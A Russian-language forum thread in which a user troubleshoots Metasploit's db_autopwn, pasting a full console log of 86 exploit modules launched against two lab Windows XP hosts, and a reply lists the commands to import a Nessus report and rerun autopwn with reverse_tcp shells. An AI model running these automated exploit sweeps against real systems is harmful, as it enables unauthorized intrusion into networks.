Использую данную программу для пентеста чистой Windows XP SP2, однако она не создает сессий. Ручками эксплуатирую, все прокатывает, а с ней никак msf > db_driver [*] Active Driver: sqlite3 [*] Available: sqlite3 [*] DB Support: Enable the mysql driver with the following command: [*] $ gem install mysql [*] This gem requires mysqlclient headers, which can be installed on Ubuntu with: [*] $ sudo apt-get install libmysqlclient-dev [*] DB Support: Enable the postgresql driver with the following command: [*] $ gem install postgres-pr msf > db_create client [*] The specified database already exists, connecting [*] Successfully connected to the database [*] File: client msf > db_nmap 192.168.1.5 Starting Nmap 5.00 ( http://nmap.org ) at 2010-03-31 20:17 MSD Interesting ports on 192.168.1.5: Not shown: 996 closed ports PORT STATE SERVICE 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 2869/tcp open unknown Nmap done: 1 IP address (1 host up) scanned in 1.55 seconds msf > db_autopwn -p -t -e [*] Analysis completed in 6 seconds (0 vulns / 0 refs) [*] [*] ================================================================================ [*] Matching Exploit Modules [*] ================================================================================ [*] 192.168.1.5:135 exploit/windows/dcerpc/ms03_026_dcom (port match) [*] 192.168.1.5:139 exploit/linux/samba/lsa_transnames_heap (port match) [*] 192.168.1.5:139 exploit/multi/samba/nttrans (port match) [*] 192.168.1.5:139 exploit/multi/samba/usermap_script (port match) [*] 192.168.1.5:139 exploit/netware/smb/lsass_cifs (port match) [*] 192.168.1.5:139 exploit/osx/samba/lsa_transnames_heap (port match) [*] 192.168.1.5:139 exploit/solaris/samba/trans2open (port match) [*] 192.168.1.5:139 exploit/windows/brightstor/ca_arcserve_342 (port match) [*] 192.168.1.5:139 exploit/windows/brightstor/etrust_itm_alert (port match) [*] 192.168.1.5:139 exploit/windows/smb/ms03_049_netapi (port match) [*] 192.168.1.5:139 exploit/windows/smb/ms04_011_lsass (port match) [*] 192.168.1.5:139 exploit/windows/smb/ms04_031_netdde (port match) [*] 192.168.1.5:139 exploit/windows/smb/ms05_039_pnp (port match) [*] 192.168.1.5:139 exploit/windows/smb/ms06_040_netapi (port match) [*] 192.168.1.5:139 exploit/windows/smb/ms06_066_nwapi (port match) [*] 192.168.1.5:139 exploit/windows/smb/ms06_066_nwwks (port match) [*] 192.168.1.5:139 exploit/windows/smb/ms06_070_wkssvc (port match) [*] 192.168.1.5:139 exploit/windows/smb/ms08_067_netapi (port match) [*] 192.168.1.5:139 exploit/windows/smb/msdns_zonename (port match) [*] 192.168.1.5:139 exploit/windows/smb/netidentity_xtierrpcpipe (port match) [*] 192.168.1.5:139 exploit/windows/smb/psexec (port match) [*] 192.168.1.5:139 exploit/windows/smb/timbuktu_plughntcommand_bof (port match) [*] 192.168.1.5:445 exploit/linux/samba/lsa_transnames_heap (port match) [*] 192.168.1.5:445 exploit/multi/samba/nttrans (port match) [*] 192.168.1.5:445 exploit/multi/samba/usermap_script (port match) [*] 192.168.1.5:445 exploit/netware/smb/lsass_cifs (port match) [*] 192.168.1.5:445 exploit/osx/samba/lsa_transnames_heap (port match) [*] 192.168.1.5:445 exploit/solaris/samba/trans2open (port match) [*] 192.168.1.5:445 exploit/windows/brightstor/ca_arcserve_342 (port match) [*] 192.168.1.5:445 exploit/windows/brightstor/etrust_itm_alert (port match) [*] 192.168.1.5:445 exploit/windows/smb/ms03_049_netapi (port match) [*] 192.168.1.5:445 exploit/windows/smb/ms04_011_lsass (port match) [*] 192.168.1.5:445 exploit/windows/smb/ms04_031_netdde (port match) [*] 192.168.1.5:445 exploit/windows/smb/ms05_039_pnp (port match) [*] 192.168.1.5:445 exploit/windows/smb/ms06_040_netapi (port match) [*] 192.168.1.5:445 exploit/windows/smb/ms06_066_nwapi (port match) [*] 192.168.1.5:445 exploit/windows/smb/ms06_066_nwwks (port match) [*] 192.168.1.5:445 exploit/windows/smb/ms06_070_wkssvc (port match) [*] 192.168.1.5:445 exploit/windows/smb/ms08_067_netapi (port match) [*] 192.168.1.5:445 exploit/windows/smb/msdns_zonename (port match) [*] 192.168.1.5:445 exploit/windows/smb/netidentity_xtierrpcpipe (port match) [*] 192.168.1.5:445 exploit/windows/smb/psexec (port match) [*] 192.168.1.5:445 exploit/windows/smb/timbuktu_plughntcommand_bof (port match) [*] 192.168.1.6:135 exploit/windows/dcerpc/ms03_026_dcom (port match) [*] 192.168.1.6:139 exploit/linux/samba/lsa_transnames_heap (port match) [*] 192.168.1.6:139 exploit/multi/samba/nttrans (port match) [*] 192.168.1.6:139 exploit/multi/samba/usermap_script (port match) [*] 192.168.1.6:139 exploit/netware/smb/lsass_cifs (port match) [*] 192.168.1.6:139 exploit/osx/samba/lsa_transnames_heap (port match) [*] 192.168.1.6:139 exploit/solaris/samba/trans2open (port match) [*] 192.168.1.6:139 exploit/windows/brightstor/ca_arcserve_342 (port match) [*] 192.168.1.6:139 exploit/windows/brightstor/etrust_itm_alert (port match) [*] 192.168.1.6:139 exploit/windows/smb/ms03_049_netapi (port match) [*] 192.168.1.6:139 exploit/windows/smb/ms04_011_lsass (port match) [*] 192.168.1.6:139 exploit/windows/smb/ms04_031_netdde (port match) [*] 192.168.1.6:139 exploit/windows/smb/ms05_039_pnp (port match) [*] 192.168.1.6:139 exploit/windows/smb/ms06_040_netapi (port match) [*] 192.168.1.6:139 exploit/windows/smb/ms06_066_nwapi (port match) [*] 192.168.1.6:139 exploit/windows/smb/ms06_066_nwwks (port match) [*] 192.168.1.6:139 exploit/windows/smb/ms06_070_wkssvc (port match) [*] 192.168.1.6:139 exploit/windows/smb/ms08_067_netapi (port match) [*] 192.168.1.6:139 exploit/windows/smb/msdns_zonename (port match) [*] 192.168.1.6:139 exploit/windows/smb/netidentity_xtierrpcpipe (port match) [*] 192.168.1.6:139 exploit/windows/smb/psexec (port match) [*] 192.168.1.6:139 exploit/windows/smb/timbuktu_plughntcommand_bof (port match) [*] 192.168.1.6:445 exploit/linux/samba/lsa_transnames_heap (port match) [*] 192.168.1.6:445 exploit/multi/samba/nttrans (port match) [*] 192.168.1.6:445 exploit/multi/samba/usermap_script (port match) [*] 192.168.1.6:445 exploit/netware/smb/lsass_cifs (port match) [*] 192.168.1.6:445 exploit/osx/samba/lsa_transnames_heap (port match) [*] 192.168.1.6:445 exploit/solaris/samba/trans2open (port match) [*] 192.168.1.6:445 exploit/windows/brightstor/ca_arcserve_342 (port match) [*] 192.168.1.6:445 exploit/windows/brightstor/etrust_itm_alert (port match) [*] 192.168.1.6:445 exploit/windows/smb/ms03_049_netapi (port match) [*] 192.168.1.6:445 exploit/windows/smb/ms04_011_lsass (port match) [*] 192.168.1.6:445 exploit/windows/smb/ms04_031_netdde (port match) [*] 192.168.1.6:445 exploit/windows/smb/ms05_039_pnp (port match) [*] 192.168.1.6:445 exploit/windows/smb/ms06_040_netapi (port match) [*] 192.168.1.6:445 exploit/windows/smb/ms06_066_nwapi (port match) [*] 192.168.1.6:445 exploit/windows/smb/ms06_066_nwwks (port match) [*] 192.168.1.6:445 exploit/windows/smb/ms06_070_wkssvc (port match) [*] 192.168.1.6:445 exploit/windows/smb/ms08_067_netapi (port match) [*] 192.168.1.6:445 exploit/windows/smb/msdns_zonename (port match) [*] 192.168.1.6:445 exploit/windows/smb/netidentity_xtierrpcpipe (port match) [*] 192.168.1.6:445 exploit/windows/smb/psexec (port match) [*] 192.168.1.6:445 exploit/windows/smb/timbuktu_plughntcommand_bof (port match) [*] ================================================================================ [*] [*] [*] (1/86 [0 sessions]): Launching exploit/windows/dcerpc/ms03_026_dcom against 192.168.1.5:135... [*] (2/86 [0 sessions]): Launching exploit/linux/samba/lsa_transnames_heap against 192.168.1.5:139... [*] (3/86 [0 sessions]): Launching exploit/multi/samba/nttrans against 192.168.1.5:139... [*] (4/86 [0 sessions]): Launching exploit/multi/samba/usermap_script against 192.168.1.5:139... [*] (5/86 [0 sessions]): Launching exploit/netware/smb/lsass_cifs against 192.168.1.5:139... [*] (6/86 [0 sessions]): Launching exploit/osx/samba/lsa_transnames_heap against 192.168.1.5:139... [*] (7/86 [0 sessions]): Launching exploit/solaris/samba/trans2open against 192.168.1.5:139... [*] (8/86 [0 sessions]): Launching exploit/windows/brightstor/ca_arcserve_342 against 192.168.1.5:139... [*] (9/86 [0 sessions]): Launching exploit/windows/brightstor/etrust_itm_alert against 192.168.1.5:139... [*] (10/86 [0 sessions]): Launching exploit/windows/smb/ms03_049_netapi against 192.168.1.5:139... [*] (11/86 [0 sessions]): Launching exploit/windows/smb/ms04_011_lsass against 192.168.1.5:139... [*] (12/86 [0 sessions]): Launching exploit/windows/smb/ms04_031_netdde against 192.168.1.5:139... [*] (13/86 [0 sessions]): Launching exploit/windows/smb/ms05_039_pnp against 192.168.1.5:139... [*] (14/86 [0 sessions]): Launching exploit/windows/smb/ms06_040_netapi against 192.168.1.5:139... [*] (15/86 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwapi against 192.168.1.5:139... [*] (16/86 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwwks against 192.168.1.5:139... [*] (17/86 [0 sessions]): Launching exploit/windows/smb/ms06_070_wkssvc against 192.168.1.5:139... [*] (18/86 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 192.168.1.5:139... [*] (19/86 [0 sessions]): Launching exploit/windows/smb/msdns_zonename against 192.168.1.5:139... [*] (20/86 [0 sessions]): Launching exploit/windows/smb/netidentity_xtierrpcpipe against 192.168.1.5:139... [*] (21/86 [0 sessions]): Launching exploit/windows/smb/psexec against 192.168.1.5:139... [*] (22/86 [0 sessions]): Launching exploit/windows/smb/timbuktu_plughntcommand_bof against 192.168.1.5:139... [*] (23/86 [0 sessions]): Launching exploit/linux/samba/lsa_transnames_heap against 192.168.1.5:445... [*] (24/86 [0 sessions]): Launching exploit/multi/samba/nttrans against 192.168.1.5:445... [*] (25/86 [0 sessions]): Launching exploit/multi/samba/usermap_script against 192.168.1.5:445... [*] (26/86 [0 sessions]): Launching exploit/netware/smb/lsass_cifs against 192.168.1.5:445... [*] (27/86 [0 sessions]): Launching exploit/osx/samba/lsa_transnames_heap against 192.168.1.5:445... [*] (28/86 [0 sessions]): Launching exploit/solaris/samba/trans2open against 192.168.1.5:445... [*] (29/86 [0 sessions]): Launching exploit/windows/brightstor/ca_arcserve_342 against 192.168.1.5:445... [*] (30/86 [0 sessions]): Launching exploit/windows/brightstor/etrust_itm_alert against 192.168.1.5:445... [*] (31/86 [0 sessions]): Launching exploit/windows/smb/ms03_049_netapi against 192.168.1.5:445... [*] (32/86 [0 sessions]): Launching exploit/windows/smb/ms04_011_lsass against 192.168.1.5:445... [*] (33/86 [0 sessions]): Launching exploit/windows/smb/ms04_031_netdde against 192.168.1.5:445... [*] (34/86 [0 sessions]): Launching exploit/windows/smb/ms05_039_pnp against 192.168.1.5:445... [*] (35/86 [0 sessions]): Launching exploit/windows/smb/ms06_040_netapi against 192.168.1.5:445... [*] (36/86 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwapi against 192.168.1.5:445... [*] (37/86 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwwks against 192.168.1.5:445... [*] (38/86 [0 sessions]): Launching exploit/windows/smb/ms06_070_wkssvc against 192.168.1.5:445... [*] (39/86 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 192.168.1.5:445... [*] (40/86 [0 sessions]): Launching exploit/windows/smb/msdns_zonename against 192.168.1.5:445... [*] (41/86 [0 sessions]): Launching exploit/windows/smb/netidentity_xtierrpcpipe against 192.168.1.5:445... [*] (42/86 [0 sessions]): Launching exploit/windows/smb/psexec against 192.168.1.5:445... [*] (43/86 [0 sessions]): Launching exploit/windows/smb/timbuktu_plughntcommand_bof against 192.168.1.5:445... [*] (44/86 [0 sessions]): Launching exploit/windows/dcerpc/ms03_026_dcom against 192.168.1.6:135... [*] (45/86 [0 sessions]): Launching exploit/linux/samba/lsa_transnames_heap against 192.168.1.6:139... [*] (46/86 [0 sessions]): Launching exploit/multi/samba/nttrans against 192.168.1.6:139... [*] (47/86 [0 sessions]): Launching exploit/multi/samba/usermap_script against 192.168.1.6:139... [*] (48/86 [0 sessions]): Launching exploit/netware/smb/lsass_cifs against 192.168.1.6:139... [*] (49/86 [0 sessions]): Launching exploit/osx/samba/lsa_transnames_heap against 192.168.1.6:139... [*] (50/86 [0 sessions]): Launching exploit/solaris/samba/trans2open against 192.168.1.6:139... [*] (51/86 [0 sessions]): Launching exploit/windows/brightstor/ca_arcserve_342 against 192.168.1.6:139... [*] (52/86 [0 sessions]): Launching exploit/windows/brightstor/etrust_itm_alert against 192.168.1.6:139... [*] (53/86 [0 sessions]): Launching exploit/windows/smb/ms03_049_netapi against 192.168.1.6:139... [*] (54/86 [0 sessions]): Launching exploit/windows/smb/ms04_011_lsass against 192.168.1.6:139... [*] (55/86 [0 sessions]): Launching exploit/windows/smb/ms04_031_netdde against 192.168.1.6:139... [*] (56/86 [0 sessions]): Launching exploit/windows/smb/ms05_039_pnp against 192.168.1.6:139... [*] (57/86 [0 sessions]): Launching exploit/windows/smb/ms06_040_netapi against 192.168.1.6:139... [*] (58/86 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwapi against 192.168.1.6:139... [*] (59/86 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwwks against 192.168.1.6:139... [*] (60/86 [0 sessions]): Launching exploit/windows/smb/ms06_070_wkssvc against 192.168.1.6:139... [*] (61/86 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 192.168.1.6:139... [*] (62/86 [0 sessions]): Launching exploit/windows/smb/msdns_zonename against 192.168.1.6:139... [*] (63/86 [0 sessions]): Launching exploit/windows/smb/netidentity_xtierrpcpipe against 192.168.1.6:139... [*] (64/86 [0 sessions]): Launching exploit/windows/smb/psexec against 192.168.1.6:139... [*] (65/86 [0 sessions]): Launching exploit/windows/smb/timbuktu_plughntcommand_bof against 192.168.1.6:139... [*] (66/86 [0 sessions]): Launching exploit/linux/samba/lsa_transnames_heap against 192.168.1.6:445... [*] (67/86 [0 sessions]): Launching exploit/multi/samba/nttrans against 192.168.1.6:445... [*] (68/86 [0 sessions]): Launching exploit/multi/samba/usermap_script against 192.168.1.6:445... [*] (69/86 [0 sessions]): Launching exploit/netware/smb/lsass_cifs against 192.168.1.6:445... [*] (70/86 [0 sessions]): Launching exploit/osx/samba/lsa_transnames_heap against 192.168.1.6:445... [*] (71/86 [0 sessions]): Launching exploit/solaris/samba/trans2open against 192.168.1.6:445... [*] (72/86 [0 sessions]): Launching exploit/windows/brightstor/ca_arcserve_342 against 192.168.1.6:445... [*] (73/86 [0 sessions]): Launching exploit/windows/brightstor/etrust_itm_alert against 192.168.1.6:445... [*] (74/86 [0 sessions]): Launching exploit/windows/smb/ms03_049_netapi against 192.168.1.6:445... [*] (75/86 [0 sessions]): Launching exploit/windows/smb/ms04_011_lsass against 192.168.1.6:445... [*] (76/86 [0 sessions]): Launching exploit/windows/smb/ms04_031_netdde against 192.168.1.6:445... [*] (77/86 [0 sessions]): Launching exploit/windows/smb/ms05_039_pnp against 192.168.1.6:445... [*] (78/86 [0 sessions]): Launching exploit/windows/smb/ms06_040_netapi against 192.168.1.6:445... [*] (79/86 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwapi against 192.168.1.6:445... [*] (80/86 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwwks against 192.168.1.6:445... [*] (81/86 [0 sessions]): Launching exploit/windows/smb/ms06_070_wkssvc against 192.168.1.6:445... [*] (82/86 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 192.168.1.6:445... [*] (83/86 [0 sessions]): Launching exploit/windows/smb/msdns_zonename against 192.168.1.6:445... [*] (84/86 [0 sessions]): Launching exploit/windows/smb/netidentity_xtierrpcpipe against 192.168.1.6:445... [*] (85/86 [0 sessions]): Launching exploit/windows/smb/psexec against 192.168.1.6:445... [*] (86/86 [0 sessions]): Launching exploit/windows/smb/timbuktu_plughntcommand_bof against 192.168.1.6:445... [*] (86/86 [0 sessions]): Waiting on 26 launched modules to finish execution... [*] (86/86 [0 sessions]): Waiting on 1 launched modules to finish execution... [*] (86/86 [0 sessions]): Waiting on 1 launched modules to finish execution... [*] (86/86 [0 sessions]): Waiting on 0 launched modules to finish execution... [*] The autopwn command has completed with 0 sessions ЗЫ: Извините если что, я спойлер не знаю как добавить. Просьба к модератору, отформатировать сообщение, чтобы нормально выглядело, а то я в хтмл не шарю(
Попробуй, nessus загрузи проскань свой ip, потом загрузи репорт в формате .nessus. Создай базу данных в метасплоите: db_create потом загрузи плюгин: load db_tracker загрузи сам отчёт .nessus (предварительно кинув в папку /home/*USER*/ : db_import_nessus_xml /home/*USER*/1.nessus Проверь на наличие сторонних хостов: db_hosts Если есть сторонние хосты удали их (пример: db_del_host 127.0.0.1) Проверь порты (точнее правильно ли загрузился отчёт): db_services Проверь уязвимости: db_vulns Как всё проверишь, запускай: db_autopwn -p -e (использовать -t не обязательно он просто выводит список все уязвимостей на порты отчёта) Попробуй ещё использовать reverse_tcp: db_autopwn -p -e -r или -b
